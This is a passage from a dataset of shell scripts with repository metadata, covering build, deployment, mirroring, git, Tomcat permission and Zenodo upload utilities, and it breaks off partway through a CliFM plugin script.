blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
a75467d4c8a08402fdc2869d978c7f4858c7d478
|
Shell
|
HumboldtWirelessLab/click-brn-scripts
|
/500-experiments/003-interference-measurement/evaluation/eval.sh
|
UTF-8
| 980
| 3.59375
| 4
|
[] |
no_license
|
#!/bin/sh
# Evaluate an interference-measurement experiment: merge the per-run
# XML results, convert them to a .mat table via XSLT, and remap string
# labels in column 2 to numeric indices.
#
# Usage: "RESULTDIR=dir ./eval.sh"  or  "./eval.sh dir"

# Resolve the directory this script lives in (handles absolute "/..."
# and relative "./..." invocations; anything else is rejected).
dir=$(dirname "$0")
pwd=$(pwd)
SIGN=`echo $dir | cut -b 1`
case "$SIGN" in
"/")
DIR=$dir
;;
".")
DIR=$pwd/$dir
;;
*)
echo "Error while getting directory"
exit -1
;;
esac
# Result directory comes from $RESULTDIR env var, or else from $1.
if [ "x$RESULTDIR" = "x" ]; then
if [ "x$1" = "x" ]; then
echo "Use: \"RESULTDIR=dir $0\" or \"$0 dir\""
exit 0
else
RESULTDIR=$1
fi
fi
# Make RESULTDIR absolute if it does not already start with '/'.
SIGN=`echo $RESULTDIR | cut -b 1`
case "$SIGN" in
"/")
;;
*)
RESULTDIR="$PWD/$RESULTDIR"
;;
esac
#echo $RESULTDIR
#echo $PWD
#echo $DIR
# Merge all per-run XMLs, then transform to the temporary .mat table.
$DIR/merge_xml.sh $RESULTDIR/ > $PWD/interference_exp.xml
xsltproc $DIR/interference2mat.xslt $PWD/interference_exp.xml > $PWD/interference_exp.mat.tmp
# Build a list of sed '-e s#label#NR#g' expressions mapping each
# distinct column-2 value to its ordinal number. SEDARG is deliberately
# left unquoted below so it word-splits into separate sed arguments.
SEDARG=`cat $PWD/interference_exp.mat.tmp | sed "s#,# #g" | awk '{print $2}' | uniq | awk '{print "-e s#"$1"#"NR"#g"}' | tr '\012' ' '`
cat $PWD/interference_exp.mat.tmp | sed $SEDARG -e "s#none#0#g" > $PWD/interference_exp.mat
rm -rf $PWD/interference_exp.mat.tmp
| true
|
c74527f8a7bc5da337e241b32ec579c3583b7794
|
Shell
|
ZVlad1980/adm_scripts
|
/api/installer/launch.sh
|
UTF-8
| 842
| 3.171875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Installer launcher: prepares directories and logging, sources the
# helper libraries, then hands control to their `install` entry point.
set -o errexit
set -o pipefail
set -o nounset
# Absolute directory of this script; root for all derived paths.
declare -r __dir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
declare -r __dir_log="${__dir}/logs"
declare -r __dir_ora="${__dir}/oracle"
declare -r __dir_ora_scripts="${__dir_ora}/scripts"
declare -r __dir_repos="${__dir}/repos"
# Log file name carries date, time and this shell's PID (${$}).
declare -r __log_file="${__dir_log}/install_$(date +%y%m%d)_$(date +%H%M)_${$}.log"
declare -r __curr_dir=$(pwd)
# Defaults to 1; overridable via the PDH_INST_ONLY_SCRIPTS env var.
declare -r __only_scripts="${PDH_INST_ONLY_SCRIPTS-1}"
declare __result
mkdir -p "${__dir_log}"
mkdir -p "${__dir_repos}"
# The sourced libraries provide out/set_log_file/finalize/install below.
. "${__dir_ora}/env/ora.env"
. "${__dir}/util.sh"
. "${__dir}/oracle_api.sh"
. "${__dir}/installer.sh"
. "${__dir}/install_api.sh"
# finalize (from the sourced libs) runs on any exit path.
trap finalize INT TERM EXIT
out "Log file: ${__log_file}"
set_log_file "${__log_file}"
out "Launcher start, parameters: ${*-Without parameters}"
install "${@}"
exit 0
| true
|
0481f2b3d4837bd4c169cfae861930b628230f95
|
Shell
|
IKAMTeam/depl-scripts
|
/config-tomcat-security.sh
|
UTF-8
| 1,049
| 3.34375
| 3
|
[] |
no_license
|
#!/bin/bash
### Script for configure Tomcat filesystem security ###
# Locks down ownership, permissions and default ACLs under $TOMCAT_PATH
# (both variables come from the sourced utils.sh environment).
# shellcheck source=utils.sh
. "$(dirname "$0")/utils.sh"
require_root_user
# Remove unresolvable symbolic links to prevent 'cannot dereference' error from chown/chmod
# FIX: '&>' is a bashism; the inner shell here is POSIX sh, where it parses as
# "run the command in the background, then truncate a file" — so the realpath
# check always succeeded and dead links were never removed. Use the portable
# '>/dev/null 2>&1' form instead.
find -L "$TOMCAT_PATH" -type l -exec sh -c 'realpath "$1" >/dev/null 2>&1 || (echo "Removing $1"; rm -f "$1")' -- {} +
# Owner = invoking user, group = Tomcat's group (follow symlinks, recursive).
chown -LR "$(whoami):$TOMCAT_GROUP" "$TOMCAT_PATH" || exit 1
# Directories: group read/exec + setgid (new files inherit group), no 'other' access.
find -L "$TOMCAT_PATH" -type d -exec chmod g+r,g-w,g+s,g+x,o-r,o-w,o-x {} + || exit 1
# Files: group read-only, no 'other' access.
find -L "$TOMCAT_PATH" -type f -exec chmod g+r,g-w,o-r,o-w,o-x {} + || exit 1
# Webapp 'css'/'img' dirs plus Tomcat's runtime dirs stay group-writable.
find "$TOMCAT_PATH"/* -maxdepth 1 -type d \( -name 'css' -or -name 'img' \) -exec chmod -R g+w {} + || exit 1
chmod -R g+w "$TOMCAT_PATH/logs" "$TOMCAT_PATH/temp" "$TOMCAT_PATH/work" || exit 1
# Default ACLs so newly created files inherit the same policy.
setfacl -LRd -m u::rwx "$TOMCAT_PATH" || exit 1
setfacl -LRd -m g::r-x "$TOMCAT_PATH" || exit 1
setfacl -LRd -m o::--- "$TOMCAT_PATH" || exit 1
setfacl -LRd -m g::rwx "$TOMCAT_PATH/logs" "$TOMCAT_PATH/temp" "$TOMCAT_PATH/work" || exit 1
echo "Permissions successfully set"
| true
|
6788e887228de8aa3b94869d01dfde64fc4f29de
|
Shell
|
maxieds/GATechGTDMMBSoftwareBackup
|
/RNADB-construction/rna2ndary/UtilityScripts/RunRNADBConstruction-MathMulberry.sh
|
UTF-8
| 1,491
| 3.5
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
## Usage: RunRNADBConstruction.sh [SequenceDataInputDir] [SequenceDataOutputDir] [ExtraScriptOptions ...]
##
## Runs GenerateRNADBSequenceData.py with the environment needed to find
## the GTFoldPython libraries.
##
## FIX: the shebang must be the very first line of the file; it used to
## sit below the usage comment, so the kernel ignored it.
PYTHON3=$(which python3)
MATH_MULBERRY_SRC=/projects/rna/RNADBConstructionScript
SEQDATA_INDIR="$MATH_MULBERRY_SRC/RNADB-sequence-data/DatabaseSequenceData"
SAMPLE_OUTDIR=./RNADBConstructionScriptOutput-$(date +"%Y.%m.%d-%H%M%S")
# Extra options forwarded verbatim to the python script; defaults to all
# args, trimmed below when $1/$2 are consumed as in/out directories.
AppendedScriptOptions=( "$@" )
if [[ "$1" != "" ]]; then
    SEQDATA_INDIR=$1
    AppendedScriptOptions=( "${@:2:${#@}-2}" )
fi
if [[ "$2" != "" ]]; then
    SAMPLE_OUTDIR=$2
    AppendedScriptOptions=( "${@:3:${#@}-2}" )
fi
# NOTE(review): the "${@:2:${#@}-2}" slice also drops the LAST argument
# when only $1 is given — preserved as-is; confirm this is intended.
mkdir -p "$SAMPLE_OUTDIR"
# ':?' guards against wiping '/*' should SAMPLE_OUTDIR ever be empty.
rm -rf "${SAMPLE_OUTDIR:?}"/*
GTFPYTHON_INSTALL_PATH="$MATH_MULBERRY_SRC/GTFoldPython/Python/PythonLibrarySrc"
GTFPYTHON_INSTALL_LIBS_PATH="$MATH_MULBERRY_SRC/GTFoldPython/Python/Lib"
RUNNER_SCRIPT_PATH="$MATH_MULBERRY_SRC/RNADB-construction/rna2ndary"
export PYTHONPATH="$GTFPYTHON_INSTALL_PATH:$RUNNER_SCRIPT_PATH"
export LD_LIBRARY_PATH="$LD_LIBRARY_PATH:$GTFPYTHON_INSTALL_PATH"
export DYLD_LIBRARY_PATH="$DYLD_LIBRARY_PATH:$GTFPYTHON_INSTALL_LIBS_PATH"
export DYLD_FALLBACK_LIBRARY_PATH="/usr/lib:/usr/local/lib:$DYLD_FALLBACK_LIBRARY_PATH"
# FIX: forward ALL extra options. The old `echo $AppendedScriptOptions`
# expanded only the array's first element, silently dropping the rest.
"$PYTHON3" "$RUNNER_SCRIPT_PATH/GenerateRNADBSequenceData.py" \
    --InDir="$SEQDATA_INDIR" \
    --OutDir="$SAMPLE_OUTDIR" \
    --OutCSV="$SAMPLE_OUTDIR/rnadb-sample-out.csv" \
    "${AppendedScriptOptions[@]}"
echo -e "\nNOTE: If you had errors running the script try running the following command first:"
echo -e " $ pip3 install --user numpy requests\n"
| true
|
4cd2ed40bfc187385dcb36f7b771b97f5e1c1107
|
Shell
|
ssb22/indexer
|
/html2apk/compile.sh
|
UTF-8
| 2,312
| 2.765625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Build, sign, align and install an Android APK using the raw SDK
# build-tools (aapt/dx-or-d8/zipalign/apksigner), without Gradle.
# Edit the exported variables below for your environment.
export SDK=/usr/local/adt-bundle-mac-x86_64-20140702/sdk # or whatever
export PLATFORM="$SDK"/platforms/android-19 # or whatever
export BUILD_TOOLS="$SDK"/build-tools/21.0.2 # or whatever
export KEYSTORE_USER=my_user_id # if you want to sign the apk
export KEYSTORE_PASS=my_password # ditto
export KEYSTORE_FILE=/path/to/your/keystore
export APPNAME=MyApp
export PACKAGE_NAME=org/ucam/ssb22/html # PLEASE CHANGE THIS
# Every step is chained with '&&' so any failure aborts the chain.
cd /path/to/your/app/workspace &&
rm -rf bin gen && mkdir bin gen &&
# Generate R.java and the resource package.
"$BUILD_TOOLS"/aapt package -v -f -I $PLATFORM/android.jar -M AndroidManifest.xml -A assets -S res -m -J gen -F bin/resources.ap_ &&
# NOTE(review): "src;gen" uses ';' as the sourcepath separator, which is
# the Windows convention — on macOS/Linux javac expects ':'. Confirm.
javac -classpath $PLATFORM/android.jar -sourcepath "src;gen" -d "bin" src/$PACKAGE_NAME/*.java gen/$PACKAGE_NAME/R.java &&
# Dex the classes: prefer dx with --min-sdk-version if supported, then
# plain dx, then the newer d8.
if "$BUILD_TOOLS"/dx --help 2>&1 >/dev/null | grep min-sdk-version >/dev/null; then
"$BUILD_TOOLS"/dx --min-sdk-version=1 --dex --output=bin/classes.dex bin/
elif [ -e "$BUILD_TOOLS"/dx ]; then "$BUILD_TOOLS"/dx --dex --output=bin/classes.dex bin/
else "$BUILD_TOOLS"/d8 --min-api 1 --output bin $(find bin -type f -name '*.class'); fi &&
cp bin/resources.ap_ bin/$APPNAME.ap_ && # change $APPNAME here and all instances below
cd bin &&
"$BUILD_TOOLS"/aapt add $APPNAME.ap_ classes.dex &&
cd .. &&
rm -f bin/$APPNAME.apk ../$APPNAME.apk &&
# Sign + align: new tooling aligns first then apksigner; old ADT signs
# with jarsigner first then aligns.
if test -e "$BUILD_TOOLS"/apksigner; then
"$BUILD_TOOLS"/zipalign 4 bin/$APPNAME.ap_ bin/$APPNAME.apk &&
"$BUILD_TOOLS"/apksigner sign --ks "$KEYSTORE_FILE" --v1-signer-name "$KEYSTORE_USER" --ks-pass env:KEYSTORE_PASS --key-pass env:KEYSTORE_PASS --out ../$APPNAME.apk bin/$APPNAME.apk
else # old ADT
jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore "$KEYSTORE_FILE" -storepass $KEYSTORE_PASS -keypass $KEYSTORE_PASS -signedjar bin/$APPNAME.apk bin/$APPNAME.ap_ $KEYSTORE_USER -tsa http://timestamp.digicert.com && # -tsa option requires an Internet connection
"$BUILD_TOOLS"/zipalign 4 bin/$APPNAME.apk ../$APPNAME.apk
fi &&
rm bin/*ap_ bin/*apk &&
cd .. || exit 1
# Install on any attached devices:
(sleep 300 ; killall adb) & # in case the following command gets stuck when unattended
export adb="$SDK"/platform-tools/adb
for D in $($adb devices|grep device$|cut -f1); do $adb -s "$D" install -r ~/Documents/workspace/RTE.apk; done || true # no error if no device connected
| true
|
553e461819d45b933e94ffff3e946c7f5e1b1842
|
Shell
|
xieydd/shell
|
/system/create_user_centos.sh
|
UTF-8
| 280
| 3.109375
| 3
|
[] |
no_license
|
#!/bin/bash
# Create the 'xieydd' account with a default password unless an entry
# for it already exists in /etc/passwd.
USER_NAME='xieydd'
USER_COUNT=$(grep -c '^xieydd:' /etc/passwd)
if [ "$USER_COUNT" -ne 1 ]; then
    useradd "$USER_NAME"
    echo "123456" | passwd "$USER_NAME" --stdin
else
    echo 'user exits'
fi
# visudo
#sed -i '/root ALL=(ALL) ALL/a\xieydd ALL=(ALL) ALL' /etc/sudoers
| true
|
512b410707de1dc1aa86ce56b217385e71777c78
|
Shell
|
YukariChiba/mirrors_sync
|
/sync/rsync_common.sh
|
UTF-8
| 682
| 3.5
| 4
|
[] |
no_license
|
#!/bin/bash
# rsync mirror-sync helper. Expects $sync_path, $sync_name and $sync_url
# to be set by the caller.
#
# Status protocol: $sync_path/status/$sync_name holds one of "syncing",
# "failed" or "normal"; a sync is skipped while it reads "syncing".
touch "$sync_path/status/$sync_name"
if [[ `cat "$sync_path/status/$sync_name"` != "syncing" ]];
then
  echo "[$sync_name] Syncing..."
  # FIX: the "syncing" marker was written to "../$sync_name", not to the
  # status file read above, so the in-progress lock never engaged.
  echo "syncing" > "$sync_path/status/$sync_name"
  rsync -rltz4 --progress --delete --log-file="$sync_path/log/$sync_name.log" "$sync_url/$sync_name" "$sync_path/data/$sync_name"
  if [ $? -ne 0 ] ;
  then
    echo "[$sync_name] Sync failed.";
    echo "failed" > "$sync_path/status/$sync_name";
  else
    echo "[$sync_name] Sync completed.";
    echo "normal" > "$sync_path/status/$sync_name";
  fi
else
  echo "[$sync_name] Disabled, skipping..."
fi
| true
|
3be095366e9409981fdbb005c655e8b04f7f69a0
|
Shell
|
edouard-lopez/dotfiles
|
/includes/posix/git.bash
|
UTF-8
| 1,521
| 4.28125
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Git helper functions; calling configure() defines them in the current
# shell (intended to be sourced from the dotfiles).
function configure() {
# GITHUB
# Create a repo on github and connect it to local repo
# @param $1|$project project name
# @param $2|server remote server
# @param $3|$user remote user account
# @return void
function github-new() {
local project="${1:-git-$RANDOM}"
local server="${2:-github.com}"
local user="${3:-edouard-lopez}"
# create directory if missing
# NOTE(review): the directory is created but not cd'd into, so the git
# commands below run in the current directory — confirm intended.
[[ "$(basename "$(pwd)")" != "$project" ]] && mkdir "$project"
# connnect to remote repo
git remote add origin https://"$server"/"$user"/"$project".git
# pull README and stuff like that
git pull origin master
# push local files
git push origin master
}
# Add existing remote branch to the remote 'all' so you can:
# git push all
# @return void
function git-add-to-push-all() {
# Fields are: 'name', 'url' and 'method'
# Iterates every push URL except those already under remote 'all'.
while read -r name url method; do
printf "Adding remote: %s (%s, %s)\n" "$name" "$url" "$method"
git config --add remote.all.url "$url"
done < <(git remote -v | awk '!/^all/ && /push/')
}
# Pull and track all remote branches
function git-pull-all() {
# Creates a local tracking branch for every remote branch except
# HEAD and master.
while read -r branch; do
printf "Pulling remote: %s\n" "$branch"
git branch --track "${branch#remotes/origin/}" "$branch"
done < <(git branch -a | grep remotes | grep -v HEAD | grep -v master)
}
}
configure
| true
|
f64ee3167f6b06257bf0ee6beee81f0cdc4cc839
|
Shell
|
windystrife/UnrealEngine_NVIDIAGameWorks
|
/Engine/Source/ThirdParty/SDL2/build.sh
|
UTF-8
| 925
| 3.640625
| 4
|
[
"MIT",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
#!/bin/bash
# Build static SDL2 (SDL-gui-backend) libraries for Linux in three
# flavors: Debug+PIC, Release, and Release+PIC.
Architecture=x86_64-unknown-linux-gnu
#Architecture=i686-unknown-linux-gnu
#Architecture=aarch64-unknown-linux-gnueabi
# BuildWithOptions <BuildDir> <SdlDir> <SdlLibName> [cmake options...]
# Configures and builds SDL in BuildDir, then copies the produced
# libSDL2.a into SdlDir/lib/Linux/<Architecture>/<SdlLibName>.
BuildWithOptions()
{
	local BuildDir=$1
	local SdlDir=$2
	local SdlLibName=$3
	shift
	shift
	shift
	# Everything after the first three args is passed straight to cmake.
	local Options=$@

	rm -rf $BuildDir
	mkdir -p $BuildDir
	pushd $BuildDir
	cmake $Options $SdlDir
	#exit 0
	make -j 4
	mkdir -p $SdlDir/lib/Linux/$Architecture/
	cp --remove-destination libSDL2.a $SdlDir/lib/Linux/$Architecture/$SdlLibName
	popd
}

# Abort on the first failing build.
set -e
SDL_DIR=SDL-gui-backend
BUILD_DIR=build-$SDL_DIR

# build Debug with -fPIC so it's usable in any type of build
BuildWithOptions $BUILD_DIR-Debug ../$SDL_DIR libSDL2_fPIC_Debug.a -DCMAKE_BUILD_TYPE=Debug -DSDL_STATIC_PIC=ON
#exit 0
BuildWithOptions $BUILD_DIR-Release ../$SDL_DIR libSDL2.a -DCMAKE_BUILD_TYPE=Release
BuildWithOptions $BUILD_DIR-ReleasePIC ../$SDL_DIR libSDL2_fPIC.a -DCMAKE_BUILD_TYPE=Release -DSDL_STATIC_PIC=ON
set +e
| true
|
4965cbd3c59e0a6e0cd684d564510235b642b6b7
|
Shell
|
AmesianX/wasm-binary-security
|
/linear-memory-analysis/build.sh
|
UTF-8
| 1,301
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
# Build main.c / main.rs with several WebAssembly toolchains (wasi-sdk
# clang, emscripten upstream & fastcomp, rustc), then dump static and
# dynamic information about the produced binaries.
# Clang wasi
compilers/wasi/wasi-sdk-8.0-linux/wasi-sdk-8.0/bin/clang --sysroot compilers/wasi/wasi-sysroot-8.0/wasi-sysroot main.c -O2 -o clang-wasi.wasm
compilers/wasi/wasi-sdk-8.0-linux/wasi-sdk-8.0/bin/clang --sysroot compilers/wasi/wasi-sysroot-8.0/wasi-sysroot main.c -O2 -Wl,--stack-first -o clang-stack-first-wasi.wasm
# Emscripten
# Each emsdk activate/env pair switches the emcc on PATH; 'which emcc'
# prints which toolchain is actually in use.
compilers//emcc-upstream/emsdk/emsdk activate latest > /dev/null
. compilers//emcc-upstream/emsdk/emsdk_env.sh > /dev/null
which emcc
emcc main.c -O2 -o emcc-upstream.js
compilers//emcc-fastcomp/emsdk/emsdk activate latest-fastcomp > /dev/null
. compilers//emcc-fastcomp/emsdk/emsdk_env.sh > /dev/null
which emcc
emcc main.c -O2 -o emcc-fastcomp.js
# Rust
rustc --target=wasm32-wasi main.rs -O -o rust-wasi.wasm
# rustc --target=wasm32-unknown-emscripten main.rs -O -o rust-emscripten.wasm
# Binary information
# Disassemble, dump sections, and grep for globals / data segments.
for wasm in *.wasm
do
echo "$wasm"
wasm2wat --generate-names "$wasm" > "$wasm.wat"
wasm-objdump -xh "$wasm" > "$wasm.objdump"
rg 'global \$g\d+' "$wasm.wat" | cat
rg 'data.*global const' "$wasm.wat" | cut -c-100
done
# Dynamic information
# Run the JS builds under node and the wasi builds under wasmtime,
# capturing stdout alongside each binary.
for js in emcc-*.js
do
echo "$js"
node "$js" | tee "$js.stdout"
done
for wasm in *-wasi.wasm
do
echo "$wasm"
wasmtime "$wasm" | tee "$wasm.stdout"
done
| true
|
e1b6fb58918c619272dc20ef7986fb0bd46c947f
|
Shell
|
domogik/domogik-website
|
/src_closed/build.sh
|
UTF-8
| 346
| 3.359375
| 3
|
[] |
no_license
|
# Build the static website: concatenate header/page/footer templates
# into HTML pages, then copy the static assets into the build dir.
TEMPLATE_DIR=./templates
STATIC_DIR=./static
BUILD_DIR=../build

# clean build
mkdir -p $BUILD_DIR
rm -Rf $BUILD_DIR/*

# generate html: each page is header + page template + footer
for page in index; do
    cat $TEMPLATE_DIR/header.tpl $TEMPLATE_DIR/$page.tpl $TEMPLATE_DIR/footer.tpl > $BUILD_DIR/$page.html
done

# copy static assets, preserving permissions
for asset in $STATIC_DIR/*; do
    cp -Rp $asset $BUILD_DIR/
done
| true
|
e620757f0267baac628b78b6e7ed5e174ec71ecc
|
Shell
|
Vauxoo/travis2docker
|
/src/travis2docker/templates/rvm_env.sh
|
UTF-8
| 372
| 3.640625
| 4
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
# Load RVM into a shell session *as a function*.
# Preference order: per-user install, then system-wide install; warn if
# neither is present.
if [[ -s "${HOME}/.rvm/scripts/rvm" ]] ; then
  # Per-user installation
  source "${HOME}/.rvm/scripts/rvm"
elif [[ -s "/usr/local/rvm/scripts/rvm" ]] ; then
  # System-wide (root) installation
  source "/usr/local/rvm/scripts/rvm"
else
  printf "An RVM installation was not found.\n"
fi
| true
|
24ce904b8bce31fc40ebe3bcec86c2791f2e0089
|
Shell
|
libscie/liberator
|
/bin/zenodo-deposit.sh
|
UTF-8
| 3,506
| 3.53125
| 4
|
[
"LicenseRef-scancode-public-domain",
"CC0-1.0"
] |
permissive
|
#!/bin/bash
# Deposit pre-1887 public-domain articles (mined with cmine) to Zenodo.
# For each subdirectory of $1 that contains fulltext.pdf, builds the
# deposit metadata from crossref_result.json, creates a deposition via
# the Zenodo API, uploads the PDF, and publishes it.
# Requires: jq, curl, and a Zenodo API token in the $TOKEN env var.
# Return error if arg is missing
if [ ! "$1" ]; then
echo "Please point towards cmine project directory"
exit 1
fi
for path in $(ls $1/*/ -d)
do
if [ -f "$path/fulltext.pdf" ]; then
# Include country
PUB=$(jq '.["publisher"]' "$path"crossref_result.json)
# Include year
YEAR=$(jq '.["published-print"]' "$path"crossref_result.json | jq '.["date-parts"][][]' | grep -P "\d{4}")
# Only works published in or before 1886 are treated as public domain.
if [ $YEAR -gt 1886 ]; then
echo "This seems to published after 1886, so skipping this for now."
else
# Creator
NAME=$(jq '.["author"][] | .family + ", " + .given' "$path"crossref_result.json || echo NA)
AFFILIATION=$(jq '.["author"][]["affiliation"]' "$path"crossref_result.json || echo null)
# Join author lines into one string and strip the JSON quotes.
NAMES=$(echo "$NAME" | tr '\n' ' ' | sed 's/"//g')
PUBLICATIONDATE=$(echo $(jq '.["published-print"]' "$path"crossref_result.json | jq '.["date-parts"][][]') | cut -d" " -f1)
TITLE=$(jq .title[] "$path"crossref_result.json)
# NOTE(review): CREATOR is assigned an empty command substitution and
# never used below — looks like leftover code; confirm before removing.
CREATOR=$()
# DESCRIPTION=$(scripts/description.sh $PUB $YEAR)
DESCRIPTION="Any copyright on this work is most likely expired, given life expectancy and copyright duration at the time of publication, or when rolling copyright occurred (i.e., changes to the legislation extending the copyright term). In case of a takedown request, the depositor requests to be provided with legal documentation from the person/organization instigating the takedown request and to be heard by Zenodo before making a decision about the takedown."
LICENSE="other-pd"
DOI=$(jq .DOI "$path"crossref_result.json)
NOTES="This file was uploaded by Chris Hartgerink (chris@libscie.org),
not the original authors or the publisher. This upload is part of
ensuring public access to the public domain.
Please see description for legal justification of why this work is (likely to be)
in the public domain and it is considered reasonable to be uploaded to Zenodo."
JOURNAL=$(jq '.["container-title"][]' "$path"crossref_result.json | tail -n 1)
VOLUME=$(jq .volume "$path"crossref_result.json)
ISSUE=$(jq .issue "$path"crossref_result.json)
PAGES=$(jq .page "$path"crossref_result.json)
# Assemble the deposition JSON. TITLE/DOI/JOURNAL/... are already
# quoted JSON values from jq; NAMES/DESCRIPTION/NOTES are quoted here.
DATA=$(cat <<EOF
{"metadata":{
"upload_type": "publication",
"publication_type": "article",
"publication_date": "1823-01-01",
"title": $TITLE,
"creators": [{"name":"$NAMES"}],
"description": "$DESCRIPTION",
"access_right": "open",
"license": "$LICENSE",
"doi": $DOI,
"keywords": ["public-domain"],
"notes": "$NOTES",
"journal_title": $JOURNAL,
"journal_volume": $VOLUME,
"journal_issue": $ISSUE,
"journal_pages": $PAGES,
"communities": [{"identifier":"libscie"}]}}
EOF
)
echo $DATA > "$path"zenodo-deposit.json
cat "$path"zenodo-deposit.json
# Create deposit
curl -iv -H "Content-Type: application/json" -X POST https://zenodo.org/api/deposit/depositions/?access_token=$TOKEN \
--data @"$path"zenodo-deposit.json | tee "$path"zenodo.json
# Get zenodo id
zid=$(cat "$path"zenodo.json|tr , '\n'|awk '/"id"/{printf"%i",$2}')
echo $zid
# Add file to deposit
curl -i -F name=fulltext.pdf -F file=@"$path"fulltext.pdf https://zenodo.org/api/deposit/depositions/$zid/files?access_token=$TOKEN
# Publish deposit
curl -i -X POST "https://zenodo.org/api/deposit/depositions/$zid/actions/publish?access_token=$TOKEN"
fi
fi
done
| true
|
ebc60c65354bd17d2077137866707b51ad5f86f2
|
Shell
|
Darcos90/repositorio-scripts-alumnos
|
/simulacro02_JuanTonda.sh
|
UTF-8
| 769
| 3.3125
| 3
|
[] |
no_license
|
#!/bin/bash
# Script: two arrays, one with the names of 6 friends and another with
# their phone numbers, stored in matching order. Prints the names, asks
# for a friend's name, and looks up the phone number by shared index.
#
# FIX: the original had "#!bin/bash" (missing leading '/') on the
# second line, so it was never a valid shebang.
#
# JUAN TONDA. October 2017. simulacro02 /arrays
clear
contador=0
declare -a usuario=( Alberto Roberto Laura Sergio Cristian Dani )
declare -a telefonos=( 911 811 711 611 511 411 )
echo "Datos cargados en el array"
clear
# Print every name; count entries as we go.
for valor in "${usuario[@]}"
do
echo "$valor"
contador=$((contador + 1))
done
read -p " Dime el nombre del amigo : " amigo
contador=0
# Linear search: the phone number shares the friend's index.
for valor in "${usuario[@]}"
do
if [ "$valor" = "$amigo" ]; then
telefono=${telefonos[$contador]}
fi
contador=$((contador + 1))
done
echo "el telefono de $amigo es $telefono"
| true
|
81dcef51a4096be2790293a38369e6bf8b68b30c
|
Shell
|
CJS-ES6-Module-Transformation-Research/transformation-tools
|
/timeTransformations.sh
|
UTF-8
| 813
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/bash
# Time repeated runs of the CJS->ESM transformation tool.
#   $1 - number of runs, $2 - project directory, $3 - project name
numRuns=$1
projDir=$2
projName=$3
curDir=$(pwd)
testOutFile="$curDir/tests_${projName}_${numRuns}runs.out"
timeOutFile="$curDir/time_${projName}_${numRuns}runs.out"
echo $timeOutFile
# if the time output file or test output file already exist,
# delete them, to avoid repeatedly appending and polluting the old
# data (move them to _old to avoid accidental deletion)
if test -f "$testOutFile"; then
    mv $testOutFile "${testOutFile}_old"
fi
if test -f "$timeOutFile"; then
    mv $timeOutFile "${timeOutFile}_old"
fi
./resetProject.sh $projDir
#cd $projDir
# Run the transformer $numRuns times; transformer output accumulates in
# $testOutFile and the `time` lines are appended to $timeOutFile.
for x in $(eval echo "{1..$numRuns}"); do
    echo "Running transformation: " $x
    { time (./runTransformer.sh $projDir>> $testOutFile 2>&1) ; } 2>>$timeOutFile
    ./resetProject.sh $projDir
    #{ time (node test/* >> $testOutFile 2>&1) ; } 2>>$timeOutFile
done
cd $curDir
| true
|
74c7fe6d7e297612905088f99e13893ad8ebdf4b
|
Shell
|
enchobelezirev/concourse
|
/oq.tests/crawling/SL4XS2/XS Deploy Service OQ Tests/Test Suites/XSA Components Acceptance Tests/Execute OQ Tests/NodeJS Sample Application Scenario/env.sh
|
UTF-8
| 765
| 2.671875
| 3
|
[] |
no_license
|
#!/bin/bash
# Test-step environment for the "NodeJS Sample Application Scenario".
# Chains up to the parent directory's env.sh (if present), then extends
# and overrides the exported test variables for this scenario.
current_dir="$(dirname -- "$(realpath -- "${BASH_SOURCE[0]}")")"
parent_dir="$(dirname -- "${current_dir}")";
if [ -f "${parent_dir}/env.sh" ] ; then
source "${parent_dir}/env.sh";
fi
# Appends this scenario's name to the STEP_PATH inherited from parent.
export STEP_PATH="${STEP_PATH}/NodeJS Sample Application Scenario"
export ADDITIONAL_OPTIONS="--no-namespaces-for-services -e nodejs-test/config-op.mtaext"
export APP_LOCATION="nodejs-test"
export ASPACE_NAME="nodejs-sample"
export EXPECTED_APPLICATIONS="node-hello-world node-hello-world-backend node-hello-world-db"
export EXPECTED_SERVICES="node-hdi-container node-uaa"
export REPOSITORY_URL="https://github.wdf.sap.corp/xs2-samples/node-hello-world.git"
export SPACE_NAME="nodejs-sample"
export XSCLIENT_CONTEXTFILE="${RT_CLIENTS_HOME_ROOT}/${ASPACE_NAME}"
| true
|
d8b101b8512f1e72535625cd7ab57a80143d7265
|
Shell
|
sinoe9891/ejercicios_bash
|
/denis-tutoria-1/ejercicio4.sh
|
UTF-8
| 600
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash
# Simple interactive menu: greet the user by name, show the shell PID,
# or quit. Loops until option 3 (salir) calls exit.

# Prompt for a name and greet it with the current time.
function nombreprint(){
echo "Por favor ingresar su nombre"
read nombre
hora=`date +"%H:%M"`
echo "Hola $nombre son las $hora"
}
# Print this shell's PID ($$).
function numberpro(){
echo "PID es: $$ "
}
# Announce and leave the program.
function salir(){
echo "Se salió del programa"
exit
}
# m never changes, so the menu repeats until 'salir' exits the shell.
m=0;
while [ $m -eq 0 ]
do
echo "Bienvenido"
echo "1) Ingrese su nombre:"
echo "2) Muestra PID:"
echo "3) Salir"
echo "Ingrese el número de una de las opciones del menú:"
read menu
case $menu in
1)
nombreprint
;;
2) numberpro
;;
3)
salir
;;
*)
echo "Escoja una correcta opción menú"
;;
esac
done
| true
|
490d418a300c2e3e714992840000aca6921e96ce
|
Shell
|
chimay/configuration
|
/clifm/plugins/vid_viewer.sh
|
UTF-8
| 1,145
| 3.765625
| 4
|
[] |
no_license
|
#!/bin/sh
# Video thumbnails plugin for CliFM
# Written by L. Abramovich
# Generates JPEG thumbnails for the given video files (or every file in
# the given directories) into a random temp dir, then shows them with
# the first available viewer (sxiv, feh, or lsix).
SUCCESS=0
ERROR=1
if ! [ "$(which ffmpegthumbnailer 2>/dev/null)" ]; then
